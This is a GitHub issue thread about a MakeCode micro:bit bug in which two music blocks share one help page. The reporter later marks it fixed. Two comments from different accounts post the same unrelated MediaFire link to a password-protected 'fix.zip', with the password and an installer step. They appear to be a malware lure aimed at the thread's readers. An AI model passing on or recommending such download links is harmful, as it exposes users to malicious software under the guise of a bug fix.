### ISSUE TITLE
Music block: -"sound is playing" help doc is the same as "volume" block.

### ISSUE THREAD

**Issue by Ramanan0530** [microsoft/pxt-microbit#5858]
**Describe the bug**
**Music block**:-"**sound is playing**" help doc is the same as "**volume**" block.
 
**Steps to reproduce the behavior**
1.Navigate to https://makecode.microbit.org/beta
2. Open any project and hover mouse to **Toolbox**
3. Select **Music block** and hover to "**Volume**" and "**sound is playing**" block
4. Right click and click **Help** & **observe** it
 
**Actual behavior**
Same help document for **"Volume"** and "**sound is playing"** blocks.
**Expect behavior**
The help document should be different for each block.

**Screen Recording:** 
![Vol](https://github.com/user-attachments/assets/d6153939-1cc5-4cba-aea0-5dbed629024d)

**Additional context**
1.OS: Windows, iPad, Mac
2.Browser: Safari, Chrome, Edge, Firefox
3.makecode.microbit,org version: 7.0.25
4.Microsoft MakeCode version: 10.2.15

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ramanan0530** [comment]
I verified this bug in the latest version:7.0.29 and it has been fixed.
